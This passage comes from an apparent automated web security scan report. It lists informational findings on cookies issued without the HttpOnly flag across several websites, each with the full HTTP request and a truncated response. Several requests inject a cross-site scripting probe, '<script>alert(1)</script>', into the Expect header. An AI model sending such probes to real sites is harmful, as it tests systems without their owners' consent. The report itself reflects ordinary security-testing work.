Severity:   Information
Confidence:   Certain
Host:   http://www.ronniesmailorder.com
Path:   /fiche_select.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fiche_select.asp?vcc=Motorcycles&mfg=Kawasaki HTTP/1.1
Host: www.ronniesmailorder.com
Proxy-Connection: keep-alive
Referer: http://www.ronnies.com/micro.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Date: Mon, 02 May 2011 02:30:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Pragma: no-store
Location: fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki
Content-Length: 186
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Set-Cookie: sid=03901941X5K1K2011J9I30I00JPMQ2929R0; path=/
Cache-control: Private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="fiche_select1.asp?cat=Motorcycles&amp;mfg=Kawasaki">here</a>.</body>
<!--T:0.0156-->
17.149. http://www.ronniesmailorder.com/fiche_select1.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ronniesmailorder.com
Path:   /fiche_select1.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki HTTP/1.1
Host: www.ronniesmailorder.com
Proxy-Connection: keep-alive
Referer: http://www.ronniesmailorder.com/fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0

Response

HTTP/1.1 200 OK
Cache-Control: Private
Date: Mon, 02 May 2011 02:06:17 GMT
Pragma: no-store
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0; path=/
Vary: Accept-Encoding
Content-Length: 483234

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<SCRIPT src="http://www.psnnewsletter.com/psnpopup.js" LANGUAGE="JavaScript"></SCRIPT>
<script src="http://www.powersportsnetwork.com/f
...[SNIP]...
17.150. http://www.schwabbankcreditcard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.schwabbankcreditcard.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.schwabbankcreditcard.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:52:34 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=77F71A24745610746457FBAF17E09359; Path=/; Domain=.schwabbankcreditcard.com
Set-Cookie: TLTUID=77F71A24745610746457FBAF17E09359; Path=/; Domain=.schwabbankcreditcard.com; Expires=Mon, 02-05-2021 00:52:34 GMT
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
17.151. http://www.searchcactus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.searchcactus.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.searchcactus.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=IMQQWQS10.10.10.2CKKIL; path=/
Server: Microsoft-IIS/5.0
Set-Cookie: serverid=scweb1
P3P: CP="IDC COR CUR OUR STP"
Date: Sun, 01 May 2011 23:26:39 GMT
Content-Type: image/x-icon
Accept-Ranges: bytes
Last-Modified: Mon, 12 Jun 2000 23:51:00 GMT
ETag: "0ca4efc9d4bf1:141c"
Content-Length: 318

..............(.......(....... ........................................................................................................................p......................p.....0...;..0..........
...[SNIP]...
17.152. http://www.securelist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.securelist.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.securelist.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sun, 01 May 2011 23:11:37 GMT
Content-Type: image/x-icon
Content-Length: 1406
Last-Modified: Wed, 20 Oct 2010 17:03:15 GMT
Connection: keep-alive
Vary: Accept-Encoding
Expires: Tue, 31 May 2011 23:11:37 GMT
Cache-Control: max-age=2592000
Set-Cookie: uid=AAAACE296KnAhWlOA5vvAg==; path=/
Accept-Ranges: bytes

..............h.......(....... ...................................-&....................................................................................................................................
...[SNIP]...
17.153. http://www.seoq.com/quotient/2011/04/22/1797/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotient/2011/04/22/1797/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:48:49 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
17.154. http://www.seoq.com/quotient/2011/04/22/1798/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /quotient/2011/04/22/1798/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:36 GMT
Server: Apache
Set-Cookie: CAKEPHP=dlhq4kuanqfrjgsc9kmcb01m25; expires=Mon, 09-May-2011 02:48:38 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dlhq4kuanqfrjgsc9kmcb01m25; expires=Mon, 09-May-2011 02:48:38 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
17.155. http://www.seoq.com/quotient/2011/04/22/2270/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotient/2011/04/22/2270/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:52 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:48:53 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
17.156. http://www.seoq.com/quotient/2011/04/22/2271/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotient/2011/04/22/2271/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:49:19 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:49:19 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
17.157. http://www.seoq.com/quotient/2011/04/22/2272/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotient/2011/04/22/2272/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:48:49 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
17.158. http://www.seoq.com/quotient/2011/05/01/2837/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotient/2011/05/01/2837/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:51:29 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:51:30 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
17.159. http://www.seoq.com/quotient/2011/05/01/2838/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotient/2011/05/01/2838/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:50:42 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:50:43 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
17.160. http://www.seoq.com/quotient/2011/05/01/2839/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotient/2011/05/01/2839/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:50:57 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:50:58 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
17.161. http://www.seoq.com/quotient/2011/05/01/2840/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotient/2011/05/01/2840/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:50:29 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:50:31 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
17.162. http://www.seoq.com/quotient/2011/05/01/2841/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /quotient/2011/05/01/2841/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:49:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=deleted; expires=Sun, 02-May-2010 02:49:32 GMT; path=/quotient
Set-Cookie: CAKEPHP=0hbqg71t59dl83tcb9iuhil4o6; expires=Mon, 09-May-2011 02:49:33 GMT; path=/quotient
Set-Cookie: CAKEPHP=0hbqg71t59dl83tcb9iuhil4o6; expires=Mon, 09-May-2011 02:49:34 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
17.163. http://www.seoq.com/quotient/analysis/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/analysis/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /quotient/analysis/ HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715; __utmz=98813212.1304319916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98813212.996978159.1304319916.1304319916.1304319916.1; __utmc=98813212; __utmb=98813212.1.10.1304319916

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:32:48 GMT
Server: Apache
Set-Cookie: CAKEPHP=p84gesk7v1bk0c3dmkbop21ss0; expires=Mon, 09-May-2011 02:32:49 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=p84gesk7v1bk0c3dmkbop21ss0; expires=Mon, 09-May-2011 02:32:49 GMT; path=/quotient
Set-Cookie: CAKEPHP=p84gesk7v1bk0c3dmkbop21ss0; expires=Mon, 09-May-2011 02:32:49 GMT; path=/quotient
Set-Cookie: CAKEPHP=p84gesk7v1bk0c3dmkbop21ss0; expires=Mon, 09-May-2011 02:32:49 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 14232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
17.164. http://www.seoq.com/web/img/bg-seo-quotient-tool-button.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /web/img/bg-seo-quotient-tool-button.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web/img/bg-seo-quotient-tool-button.jpg HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/quotient/analysis/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715; __utmz=98813212.1304319916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98813212.996978159.1304319916.1304319916.1304319916.1; __utmc=98813212; __utmb=98813212.1.10.1304319916

Response

HTTP/1.0 404 Not Found
Date: Mon, 02 May 2011 02:33:48 GMT
Server: Apache
Set-Cookie: CAKEPHP=sj9juf9refplohbur110cihta7; expires=Thu, 01-May-2036 08:33:49 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 7911
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...
17.165. http://www.serengeticatalog.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.serengeticatalog.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.serengeticatalog.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:55:53 GMT
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: balance=K7D4lUZpgAHaiH3AJvHKqcVFSE/sycOmNPJ30zrDFARriwF8Eb4u7i6w6vu2k7P062AwJjcEcq5Yhw==; path=/

17.166. http://www.sportsmanswarehouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sportsmanswarehouse.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sportsmanswarehouse.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Web Server 1.0
Date: Sun, 01 May 2011 23:47:24 GMT
Set-Cookie: NSC_tqpsutnbot_qspe_mc=ffffffff09c9382a45525d5f4f58455e445a4a4229a0;path=/
Content-Length: 0

17.167. http://www.tellusaboutus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tellusaboutus.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tellusaboutus.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v3.0
IISExport: This web site was exported using IIS Export v4.1
IISExport: This web site was exported using IIS Export v4.1
IISExport: This web site was exported using IIS Export v4.2
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:11:38 GMT
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=c604a8c000005000; Path=/; Max-age=3600

17.168. http://www.trashedgirlfriends.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trashedgirlfriends.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trashedgirlfriends.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:44:53 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: RNLBSERVERID=ded377; path=/
Content-Length: 378

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
